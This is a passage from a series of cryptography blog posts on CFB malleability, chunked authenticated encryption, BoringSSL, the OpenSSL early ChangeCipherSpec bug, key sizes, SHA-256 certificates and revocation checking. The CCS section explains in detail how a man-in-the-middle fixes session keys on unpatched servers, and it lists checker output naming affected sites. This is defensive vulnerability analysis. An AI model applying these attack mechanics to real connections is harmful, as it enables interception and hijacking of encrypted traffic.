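To illustrate that bit-flipping behaviour, here is a small sketch of plain CFB over 64-bit blocks. The "block cipher" is a toy, insecure mixing function of my own choosing (CFB only ever uses the encrypt direction) and this is textbook CFB rather than OpenPGP's exact variant, so treat it purely as a demonstration of the malleability.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy keyed mixing function standing in for a block cipher. NOT secure. */
static uint64_t toy_encrypt_block(uint64_t key, uint64_t block) {
  uint64_t z = block ^ key;
  z = (z ^ (z >> 30)) * UINT64_C(0xbf58476d1ce4e5b9);
  z = (z ^ (z >> 27)) * UINT64_C(0x94d049bb133111eb);
  return z ^ (z >> 31);
}

/* CFB: c[i] = p[i] ^ E(c[i-1]), where c[-1] is the IV. */
static void cfb_encrypt(uint64_t key, uint64_t iv, const uint64_t *p,
                        uint64_t *c, size_t n) {
  uint64_t prev = iv;
  for (size_t i = 0; i < n; i++) {
    c[i] = p[i] ^ toy_encrypt_block(key, prev);
    prev = c[i];
  }
}

static void cfb_decrypt(uint64_t key, uint64_t iv, const uint64_t *c,
                        uint64_t *p, size_t n) {
  uint64_t prev = iv;
  for (size_t i = 0; i < n; i++) {
    p[i] = c[i] ^ toy_encrypt_block(key, prev);
    prev = c[i];
  }
}

/* The attacker's move: flip one ciphertext bit without knowing the key. */
static void flip_bit(uint64_t *c, size_t n, size_t block, unsigned bit) {
  assert(block < n && bit < 64);
  c[block] ^= UINT64_C(1) << bit;
}
```

Flipping a bit in ciphertext block 1 flips exactly that bit in plaintext block 1, scrambles block 2 and leaves every other block untouched.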

The flaw here isn't in CFB mode's malleability, but in OpenPGP forcing the use of unauthenticated plaintext in practical situations. (Indeed, if you are ever thinking about the malleability of ciphertext, you have probably already lost.)

I will even claim that the existence of an API that can operate in a streaming fashion over large records (i.e. will encrypt and defer the authenticator and will decrypt and return unauthenticated plaintext) is a mistake. Not only is it too easy to misunderstand and misuse (like the gpg example above) but, even if correctly buffered in a particular implementation, the existence of large records may force other implementations to do dangerous things because of a lack of buffer space.

If large messages are chunked at 16KB then the overhead of sixteen bytes of authenticator for every chunk is only 0.1%. Additionally, you can safely stream the decryption (as long as you can cope with truncation of the plaintext).

Although safer in general, when chunking one has to worry that an attacker hasn't reordered chunks, hasn't dropped chunks from the start and hasn't dropped chunks from the end. But sadly there's not a standard construction for taking an AEAD and making a scheme suitable for encrypting large files (AERO might be close, but it's not quite what I have in mind). Ideally such a scheme would take an AEAD and produce something very like an AEAD in that it takes a key, nonce and additional data, but can safely work in a streaming fashion. I don't think it need be very complex: take 64 bits of the nonce from the underlying AEAD as the chunk number, always start with chunk number zero and feed the additional data into chunk zero with a zero byte prefix. Prefix each chunk ciphertext with a 16 bit length and set the MSB to indicate the last chunk and authenticate that indication by setting the additional data to a single, 1 byte. The major worry might be that for many underlying AEADs, taking 64 bits of the nonce for the chunk counter leaves one with very little (or none!) left.
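The framing part of that idea might look something like the following. This is only a sketch of the bookkeeping, with no actual AEAD involved, and it rests on assumptions that the text above doesn't fix: a 96-bit nonce (leaving a 4-byte caller-chosen prefix), a big-endian chunk counter, and helper names that I've made up.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define NONCE_LEN 12            /* assumed 96-bit AEAD nonce */
#define LAST_CHUNK_FLAG 0x8000u /* MSB of the 16-bit length marks the end */
#define MAX_CHUNK_LEN 0x7fffu   /* 15 bits remain for the length */

/* Per-chunk nonce: 4-byte prefix, then the 64-bit chunk number. */
static void chunk_nonce(uint8_t out[NONCE_LEN], const uint8_t prefix[4],
                        uint64_t chunk_number) {
  memcpy(out, prefix, 4);
  for (int i = 0; i < 8; i++) {
    out[4 + i] = (uint8_t)(chunk_number >> (56 - 8 * i));
  }
}

/* 16-bit length prefix with the last-chunk indication in the top bit. */
static uint16_t encode_chunk_header(uint16_t len, int is_last) {
  assert(len <= MAX_CHUNK_LEN);
  return (uint16_t)(len | (is_last ? LAST_CHUNK_FLAG : 0u));
}

static uint16_t chunk_len(uint16_t header) {
  return (uint16_t)(header & MAX_CHUNK_LEN);
}

static int chunk_is_last(uint16_t header) {
  return (header & LAST_CHUNK_FLAG) != 0;
}
```

A decryptor would count chunks itself, starting at zero, rather than trusting anything in the stream, so that reordered or dropped chunks fail to authenticate under the expected nonce.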

That requires more thought before using it for real but, if you are ever building encryption-at-rest, please don't mess it up like we did 20 years ago. (Although, even with that better design, piping the output into tar may still be unwise because an attacker can truncate the stream at a chunk boundary: perhaps eliminating important files in the process.)

Update: On Twitter, zooko points to Tahoe-LAFS as an example of getting it right. Additionally, taking the MAC of the current state of a digest operation and continuing the operation has been proposed for sponge functions (like SHA-3) under the name MAC-and-continue. The exact provenance of this isn't clear, but I think it might have been from the Keccak team in this paper. Although MAC-and-continue doesn't allow random access, which might be important for some situations.

BoringSSL

Earlier this year, before Apple had too many goto fails and GnuTLS had too few, before everyone learnt that TLS heart-beat messages were a thing and that some bugs are really old, I started a tidy up of the OpenSSL code that we use at Google.

We have used a number of patches on top of OpenSSL for many years. Some of them have been accepted into the main OpenSSL repository, but many of them don’t mesh with OpenSSL’s guarantee of API and ABI stability and many of them are a little too experimental.

But as Android, Chrome and other products have started to need some subset of these patches, things have grown very complex. The effort involved in keeping all these patches (and there are more than 70 at the moment) straight across multiple code bases is getting to be too much.

So we’re switching models to one where we import changes from OpenSSL rather than rebasing on top of them. The result of that will start to appear in the Chromium repository soon and, over time, we hope to use it in Android and internally too.

There are no guarantees of API or ABI stability with this code: we are not aiming to replace OpenSSL as an open-source project. We will still be sending them bug fixes when we find them and we will be importing changes from upstream. Also, we will still be funding the Core Infrastructure Initiative and the OpenBSD Foundation.

But we’ll also be more able to import changes from LibreSSL and they are welcome to take changes from us. We have already relicensed some of our prior contributions to OpenSSL under an ISC license at their request and completely new code that we write will also be so licensed.

(Note: the name is aspirational and not yet a promise.)

Early ChangeCipherSpec Attack

OpenSSL 1.0.1h (and others) were released today with a scary looking security advisory and that's always an event worth looking into. (Hopefully people are practiced at updating OpenSSL now!)

Update: the original reporter has a blog post up. Also, I won't, personally, be answering questions about specific Google services. (I cut this blog post together from notes that I'm writing for internal groups to evaluate and this is still very fresh.)

Update: my initial thoughts from looking at the diff still seem to be holding up. Someone is welcome to write a more detailed analysis than below. HP/ZDI have a write up of one of the DTLS issues.

There are some critical bug fixes to DTLS (TLS over datagram transports, i.e. UDP), but most people will be more concerned about the MITM attack against TLS (CVE-2014-0224).

The code changes are around the rejection of ChangeCipherSpec messages, which are messages sent during the TLS handshake that mark the change from unencrypted to encrypted traffic. These messages aren't part of the handshake protocol itself and aren't linked into the handshake state machine in OpenSSL. Rather there's a check in the code that they are only received when a new cipher is ready to be used. That check (for s->s3->tmp.new_cipher in s3_pkt.c) seems reasonable, but new_cipher is actually set as soon as the cipher for the connection has been decided (i.e. once the ServerHello message has been sent/received), not when the cipher is actually ready! It looks like this is the problem that's getting fixed in this release.

Here's the code in question that handles a ChangeCipherSpec message:

int ssl3_do_change_cipher_spec(SSL *s)
	{
	int i;
	const char *sender;
	int slen;

	if (s->state & SSL_ST_ACCEPT)
		i=SSL3_CHANGE_CIPHER_SERVER_READ;
	else
		i=SSL3_CHANGE_CIPHER_CLIENT_READ;

	if (s->s3->tmp.key_block == NULL) /* (1) */
		{
		if (s->session == NULL)
			{
			/* might happen if dtls1_read_bytes() calls this */
			SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC,SSL_R_CCS_RECEIVED_EARLY);
			return (0);
			}

		s->session->cipher=s->s3->tmp.new_cipher;
		if (!s->method->ssl3_enc->setup_key_block(s)) return(0); /* (2) */
		}

	if (!s->method->ssl3_enc->change_cipher_state(s,i))
		return(0);

	/* we have to record the message digest at
	 * this point so we can get it before we read
	 * the finished message */
	if (s->state & SSL_ST_CONNECT)
		{
		sender=s->method->ssl3_enc->server_finished_label;
		slen=s->method->ssl3_enc->server_finished_label_len;
		}
	else
		{
		sender=s->method->ssl3_enc->client_finished_label;
		slen=s->method->ssl3_enc->client_finished_label_len;
		}

	i = s->method->ssl3_enc->final_finish_mac(s,
		sender,slen,s->s3->tmp.peer_finish_md); /* (3) */
	if (i == 0)
		{
		SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC, ERR_R_INTERNAL_ERROR);
		return 0;
		}
	s->s3->tmp.peer_finish_md_len = i;

	return(1);
	}

If a ChangeCipherSpec message is injected into the connection after the ServerHello, but before the master secret has been generated, then ssl3_do_change_cipher_spec will generate the keys (2) and the expected Finished hash (3) for the handshake with an empty master secret. This means that both are based only on public information. Additionally, the keys will be latched because of the check at (1) - further ChangeCipherSpec messages will regenerate the expected Finished hash, but not the keys.
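Reduced to its essentials, the problem is the difference between "a cipher has been chosen" and "the keys can actually be derived". The following toy model shows the two conditions side by side. It is entirely hypothetical: the struct and function names are mine, it bears no relation to OpenSSL's real data structures, and it is not the patch that was shipped.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, heavily simplified handshake state. */
struct toy_handshake {
  bool cipher_chosen;     /* set once the ServerHello is sent/received */
  bool master_secret_set; /* set once the key exchange has completed */
  bool ccs_seen;          /* a ChangeCipherSpec was already processed */
};

/* Mirrors the flawed condition: only asks whether a cipher was chosen. */
static bool ccs_allowed_buggy(const struct toy_handshake *hs) {
  assert(hs != NULL);
  return hs->cipher_chosen;
}

/* Stricter condition: keys must be derivable and no CCS seen so far. */
static bool ccs_allowed_strict(const struct toy_handshake *hs) {
  assert(hs != NULL);
  return hs->cipher_chosen && hs->master_secret_set && !hs->ccs_seen;
}
```

In the window after the ServerHello but before the key exchange, the first function accepts a ChangeCipherSpec and the second rejects it.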

The oldest source code on the OpenSSL site is for 0.9.1c (Dec 28, 1998) and the affected code appears almost unchanged. So it looks like this bug has existed for 15+ years.

The implications of this are pretty complex.

For a client there's an additional check in the code that requires that a CCS message appear before the Finished and after the master secret has been generated. An attacker can still inject an early CCS too and the keys will be calculated with an empty master secret. Those keys will be latched - another CCS won't cause them to be recalculated. However, when sending the second CCS that the client code requires, the Finished hash is recalculated with the correct master secret. This means that the attacker can't fabricate an acceptable Finished hash. This stops the obvious, generic impersonation attack against the client.

For a server, there's no such check and it appears to be possible to send an early CCS message and then fabricate the Finished hash because it's based on an empty master secret. However, that doesn't obviously gain an attacker anything. It would be interesting if a connection with a client certificate could be hijacked, but there is a check in ssl3_get_cert_verify that a CCS hasn't been already processed so that isn't possible.

Someone may be able to do something more creative with this bug; I'm not ruling out that there might be other implications.

Things change with an OpenSSL 1.0.1 server however. In 1.0.1, a patch of mine was included that moves the point where Finished values are calculated. The server will now use the correct Finished hash even if it erroneously processed a CCS, but this interacts badly with this bug. The server code (unlike the client) won't accept two CCS messages in a handshake. So, if an attacker injects an early CCS at the server to fixate the bad keys, then it's not possible for them to send a second in order to get it to calculate the correct Finished hash. But with 1.0.1, the server will use the correct Finished hash and will reply with the correct hash to the client. This explains the 1.0.1 and 1.0.2 mention in the advisory. With any OpenSSL client talking to an OpenSSL 1.0.1 server, an attacker can inject CCS messages to fixate the bad keys at both ends but the Finished hashes will still line up. So it's possible for the attacker to decrypt and/or hijack the connection completely.

The good news is that these attacks need man-in-the-middle position against the victim and that non-OpenSSL clients (IE, Firefox, Chrome on Desktop and iOS, Safari etc) aren't affected. None the less, all OpenSSL users should be updating.

Update: I hacked up the Go TLS library to perform the broken handshake in both 0.9.8/1.0.0 and 1.0.1 modes. There's a patch for crypto/tls and a tool that will attempt to do those broken handshakes and tell you if either worked. For example (at the time of writing):

$ ./earlyccs_check google.com
Handshake failed with error: remote error: unexpected message
Looks ok.
$ ./earlyccs_check github.com
Server is affected (1.0.1).
$ ./earlyccs_check amazon.com
Server is affected (0.9.8 or 1.0.0).

Matching primitive strengths

It's a common, and traditional, habit to match the strengths of cryptographic primitives. For example, one might design at the 128-bit security level and pick AES-128, SHA-256 and P-256. Or if someone wants “better” security, one might target a 192-bit security level with AES-192, SHA-384 and P-384. NIST does this sort of thing, for example in 800-57/3, section 5.2.

The logic underlying this is that an attacker will attack at a system's weakest point, so anything that is stronger than the weakest part is a waste. But, while matching up the security level might have made sense in the past, I think it warrants reconsideration now.

Consider the energy needed to do any operation 2^128 times: Landauer tells us that erasing a bit takes a minimum amount of energy, and any actual crypto function will involve erasing many bits. But, for the sake of argument, let's say that we're doing a single bit XOR. If we take the minimum energy at room temperature (to save energy on refrigeration) we get 2.85×10^-21 × 2^128 = 0.97×10^18 J. That's about “yearly electricity consumption of South Korea as of 2009” according to Wikipedia. If we consider that actually doing anything useful in each of those 2^128 steps is going to take orders of magnitude more bit operations, and that we can't build a computer anywhere near the theoretic limit, we can easily reach, say, 5.5×10^24 J, which is “total energy from the Sun that strikes the face of the Earth each year”.
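As a rough check of that arithmetic, here is a minimal Python sketch. It assumes "room temperature" means about 298 K and uses the Landauer bound of k·T·ln 2 per erased bit; the function names are only illustrative.

```python
import math

BOLTZMANN = 1.380649e-23  # Boltzmann constant in J/K
ROOM_TEMP_K = 298.0       # assumption: "room temperature" is roughly 298 K


def landauer_limit(temp_kelvin: float) -> float:
    """Minimum energy, in joules, to erase one bit at the given temperature."""
    return BOLTZMANN * temp_kelvin * math.log(2)


def energy_for_operations(log2_ops: int, temp_kelvin: float = ROOM_TEMP_K) -> float:
    """Energy for 2**log2_ops single-bit erasures at the Landauer limit."""
    return landauer_limit(temp_kelvin) * 2.0 ** log2_ops


if __name__ == "__main__":
    print(f"per bit:        {landauer_limit(ROOM_TEMP_K):.3g} J")
    print(f"2^128 erasures: {energy_for_operations(128):.3g} J")
```

The per-bit figure comes out close to the 2.85×10^-21 J used above, and the total for 2^128 erasures lands just under 10^18 J.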

(The original version of this post discussed incrementing a 128-bit counter and said that it took two erasures per increment. Samuel Neves on Twitter pointed out that incrementing the counter doesn't involve destroying the information of the old value and several people pointed out that one can hit all the bit-patterns with a Gray code and thus only need to flip a single bit each time. So I changed the above to use a one-bit XOR as the basic argument still holds.)

So any primitive at or above the 128-bit security level is equally matched today, because they are all effectively infinitely strong.

One way to take this is to say that anything above 128 bits is a waste of time. Another is to say that one might want to use primitives above that level, but based on the hope that discontinuous advances leave it standing but not the lesser primitives. The latter involves a lot more guesswork than the old practice of making the security levels match up. Additionally, I don't think most people would think that an analytic result is equally likely for all classes of primitives, so one probably doesn't want to spend equal amounts on them all.

Consider the difference between P-256 and P-384 (or curve25519 and Curve41417 or Hamburg's Goldilocks-448). If they are all infinitely strong today then the reason to want to use a larger curve is because you expect some breakthrough, but not too much of a breakthrough. Discrete log in an elliptic-curve group is a square-root work function today. For those larger curves to make sense you have to worry about a breakthrough that can do it in cube-root time, but not really fourth-root and certainly not fifth-root. How much would you pay to insure yourself against that precise possibility? And how does that compare against the risk of a similar breakthrough in AES?
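To make the "some breakthrough, but not too much" window concrete, here is a small Python sketch. It treats the group sizes as exactly 256 and 384 bits, which is an approximation, and the `security_bits` helper is purely illustrative.

```python
# Approximate group sizes in bits (assumption: treated as exact powers of two).
CURVES = {"P-256": 256, "P-384": 384}


def security_bits(group_bits: int, root: int) -> float:
    """log2 of the attack cost if discrete log costs the root-th root of the group size."""
    return group_bits / root


if __name__ == "__main__":
    for root in (2, 3, 4, 5):
        row = ", ".join(
            f"{name}: {security_bits(bits, root):.0f} bits" for name, bits in CURVES.items()
        )
        print(f"root {root}: {row}")
```

Under these assumptions, a cube-root attack would leave P-384 at the 128-bit level while P-256 drops well below it; with a fourth-root attack both fall under 128 bits, so the larger curve only pays off in the narrow cube-root case.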

It is also worth considering whether the security-level is defined in a way that matches your needs. AES-128 is generally agreed to have a 128-bit security level, but if an attacker is happy breaking any one of 2^n keys then they can realise a significant speedup. An “unbalanced” choice of cipher key size might be reasonable if that attack is a concern.

So maybe a 256-bit cipher (ciphers do pretty well now, just worry about Grover's algorithm), SHA-384 (SHA-256 should be fine, but hash functions have, historically, had a bad time) and 512(? see below)-bit McEliece (originally given here as 128-bit) is actually “balanced” these days.

(Thanks to Mike Hamburg and Trevor Perrin, with whom I was discussing this after Mike presented his Goldilocks curve. Thanks to JP Aumasson on Twitter and pbsd on HN for suggesting multi-target attacks as a motivation for large cipher key sizes. Also to pbsd for pointing out a quantum attack against McEliece that I wasn't aware of.)

SHA-256 certificates are coming

It's a neat result in cryptography that you can build a secure hash function given a secure signature scheme, and you can build a secure signature scheme given a secure hash function. However, far from the theory, in the real world, lots of signatures today depend on SHA-1, which is looking increasingly less like a secure hash function.

There are lots of properties by which one can evaluate a hash function, but the most important are preimage resistance (if I give you a hash, can you find an input with that hash value?), second preimage resistance (if I give you a message, can you find another that hashes to the same value?) and collision resistance (can you find two messages with the same hash?). Of those, the third appears to be much harder to meet than the first two, based on historical results against hash functions.

Back when certificates were signed with MD5, a chosen-prefix collision attack (i.e. given two messages, can you append different data to each so that the results have the same hash?) against MD5 was used at least twice to break the security of the PKI. First the MD5 Collisions Inc demo against RapidSSL and then the Flame malware.

Today, SHA-1 is at the point where a collision attack is estimated to take 2^61 work and a chosen-prefix collision to take 2^77. Both are below the design strength of 2^80 and even that design strength isn't great by today's standards.

We hope that we have a second line of defense for SHA-1: after the MD5 Collisions Inc demo, CAs were required to use random serial numbers. A chosen-prefix attack requires being able to predict the certificate contents that will be signed and the random serial number should thwart that. With random serials we should be resting on a stronger hash function property called target-collision resistance. (Although I'm not aware of any proofs that random serials actually put us on TCR.)

Still, it would be better not to depend on those band-aids and to use a hash function with a better design strength while we do it. So certificates are starting to switch to using SHA-256. A large part of that shift came from Microsoft forbidding certificates using SHA-1 starting in 2016.

For most people, this will have no effect. Twitter ended up with a SHA-256 certificate after they replaced their old one because of the OpenSSL heartbeat bug. So, if you can still load Twitter's site, then you're fine.

But there are a lot of people using Windows XP prior to Service Pack 3, and they will have problems. We've already seen lots of user reports of issues with Twitter (and other sites) from these users. Wherever possible, installing SP3 is the answer. (Or, better yet, updating from Windows XP.)

There are also likely to be problems with embedded clients, old phones etc. Some of these may not come to light for a while.

We've not yet decided what Google's timeline for switching is, but we will be switching prior to 2016. If you're involved with something embedded that speaks to Google over HTTPS (and there's a lot of it), now is the time to test https://cert-test.sandbox.google.com, which is using a SHA-256 certificate. I'll be using other channels to contact the groups that we know about but, on the web, we don't always know what's talking to us.

Revocation still doesn't work

I was hoping to be done with revocation for a bit, but sadly not.

GRC have published a breathless piece attacking a straw man argument: “Google tells us ... that Chrome's unique CRLSet solution provides all the protection we need”. I call it a straw man because I need only quote my own posts that GRC have read to show it.

The original CRLSets announcement contained two points. Firstly that online revocation checking doesn't work and that we were switching it off in Chrome in most cases. Secondly, that we would be using CRLSets to avoid having to do full binary updates in order to respond to emergency incidents.

In the last two paragraphs I mentioned something else. Quoting myself:

“Since we're pushing a list of revoked certificates anyway, we would like to invite CAs to contribute their revoked certificates (CRLs) to the list. We have to be mindful of size, but the vast majority of revocations happen for purely administrative reasons and can be excluded. So, if we can get the details of the more important revocations, we can improve user security. Our criteria for including revocations are:

  1. The CRL must be crawlable: we must be able to fetch it over HTTP and robots.txt must not exclude GoogleBot.
  2. The CRL must be valid by RFC 5280 and none of the serial numbers may be negative.
  3. CRLs that cover EV certificates are taken in preference, while still considering point (4).
  4. CRLs that include revocation reasons can be filtered to take less space and are preferred.”

In short, since we were pushing revocations anyway, maybe we could get some extra benefit from it. It would be better than nothing, which is what browsers otherwise have with soft-fail revocation checking.

I mentioned it again, last week (emphasis added):

“We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do.”

“The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened.”

And yet, GRC managed to write pages (including cartoons!) exposing the fact that it doesn't cover many revocations and attacking Chrome for it.

They also claim that soft-fail revocation checking is effective:

The claim is that a user will download and cache a CRL while not being attacked and then be protected from a local attacker using a certificate that was included on that CRL. (I'm paraphrasing; you can search for “A typical Internet user” in their article for the original.)

There are two protocols used in online revocation checking: OCSP and CRL. The problem is that OCSP only covers a single certificate and OCSP is used in preference because it's so much smaller and thus removes the need to download CRLs. So the user isn't expected to download and cache the CRL anyway. So that doesn't work.

However, it's clear that someone is downloading CRLs because Cloudflare are spending half a million dollars a month to serve CRLs. Possibly it's non-browser clients but the bulk is probably CAPI (the library that IE, Chrome and other software on Windows typically uses - although not Firefox). A very obscure fact about CAPI is that it will download a CRL when it has 50 or more OCSP responses cached for a given CA certificate. But CAs know this and split their CRLs so that they don't get hit with huge bandwidth bills. But a split CRL renders the claimed protection from caching ineffective, because the old certificate for a given site is probably in a different part.

So I think the claim is that doing blocking OCSP lookups is a good idea because, if you use CAPI on Windows, then you might cache 50 OCSP responses for a given CA certificate. Then you'll download and cache a CRL for a while and then, depending on whether the CA splits their CRLs, you might have some revocations cached for a site that you visit.

It seems that the argument is actually for something like CRLSets (download and cache revocations) over online checking; it's just a Rube Goldberg machine to, perhaps, implement it!

So, once again, revocation doesn't work. It doesn't work in other browsers and CRLSets aren't going to cover much in Chrome, as I've always said. GRC's conclusions follow from those errors and end up predictably far from the mark.

In order to make this post a little less depressing, let's consider whether it's reasonable to aim to cover everything with CRLSets. (Which I mentioned before as well, but I'll omit the quote.) GRC quote numbers from Netcraft claiming 2.85 million revocations, although some are from certificate authorities not trusted by mainstream web browsers. I spent a few minutes harvesting CRLs from the CT log. This only includes certificates that are trusted by a reasonable number of people and I only waited for half the log to download. From that half I threw in the CRLs included by CRLSets and got 2356 URLs after discarding LDAP ones.

I tried downloading them and got 2164 files. I parsed them and eliminated duplicates and my quick-and-dirty parser skipped quite a few. None the less, this very casual search found 1,062 issuers and 4.2 million revocations. If they were all dropped into the CRLSet, it would take 39MB.

So that's a ballpark figure, but we need to design for something that will last a few years. I didn't find figures on the growth of HTTPS sites, but Netcraft say that the number of web sites overall is growing at 37% a year. It seems reasonable that the number of HTTPS sites, thus certificates, thus revocations will double a couple of times in the next five years.

There's also the fact that if we subsidise revocation with the bandwidth and computers of users, then demand for revocation will likely increase. Symantec, I believe, have experimented with certificates that are issued for the maximum time (five years at the moment) but sold in single year increments. When it comes to the end of the year, they'll remind you to renew. If you do, you don't need to do anything, otherwise the certificate gets revoked. This seems like a good deal for the CA so, if we make revocation really effective, I'd expect to see a lot more of it. Perhaps factor in another doubling for that.

So we would need to scale to ~35M revocations in five years, which is ~300MB of raw data. That would need to be pushed to all users and delta updated. (I don't have numbers for the daily delta size.)
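The estimate above can be reproduced with a few lines of Python. This is only a sketch of the back-of-the-envelope reasoning: it assumes two doublings from growth in HTTPS sites and one more from increased demand for revocation, and that size scales linearly with the number of revocations.

```python
def project(revocations: float, size_mb: float, doublings: int):
    """Scale a revocation count and its CRLSet size by a number of doublings."""
    factor = 2 ** doublings
    return revocations * factor, size_mb * factor


if __name__ == "__main__":
    # Figures from the casual CRL harvest: 4.2 million revocations in 39MB.
    # Assumption: 2 doublings for HTTPS growth + 1 for extra revocation demand.
    revs, size = project(4.2e6, 39.0, doublings=3)
    print(f"{revs / 1e6:.1f}M revocations, {size:.0f}MB")
```

With those inputs the projection is a little under 35M revocations and a little over 300MB, consistent with the rounded figures in the text.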

That would obviously take a lot of bandwidth and a lot of resources on the client. We would really need to aim at mobile as well, because that is likely to be the dominant HTTPS client in a few years, making storage and bandwidth use even more expensive.

Some probabilistic data structure might help. I've written about that before. Then you have to worry about false positives and the number of reads needed per validation. Phones might use Flash for storage, but it's remarkably slow.

Also, would you rather spend those resources on revocation, or on distributing the Safe Browsing set to mobile devices? Or would you spend the memory on improving ASLR on mobile devices? Security is a big picture full of trade-offs. It's not clear that revocation warrants all that spending.

So, if you believe that downloading and caching revocation is the way forward, I think those are the parameters that you have to deal with.

No, don't enable revocation checking

Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background:

Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them.

Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days.

The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. If you accept certificates when you can't get an answer that's called soft-fail.
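The difference between the two policies fits in a few lines. The following Python sketch is illustrative only: the `Status` type and `accept_certificate` function are hypothetical names, and `None` stands in for "no answer could be obtained from the OCSP server".

```python
from enum import Enum
from typing import Optional


class Status(Enum):
    GOOD = "good"
    REVOKED = "revoked"


def accept_certificate(ocsp_result: Optional[Status], hard_fail: bool) -> bool:
    """Decide whether to accept a certificate given an OCSP lookup result.

    ocsp_result is None when no answer could be obtained at all.
    """
    if ocsp_result is Status.REVOKED:
        return False
    if ocsp_result is Status.GOOD:
        return True
    # No answer: hard-fail rejects the certificate, soft-fail accepts it.
    return not hard_fail


if __name__ == "__main__":
    print("soft-fail, no answer:", accept_certificate(None, hard_fail=False))
    print("hard-fail, no answer:", accept_certificate(None, hard_fail=True))
```

The two policies only differ in the `None` case, so everything hinges on who is able to cause a lookup to go unanswered.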

Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.)

So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases:

If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted.

The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies.

We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex:

Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.)

Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks.

That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful.

So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do.

A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates.

The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates.

In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers.

The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense.

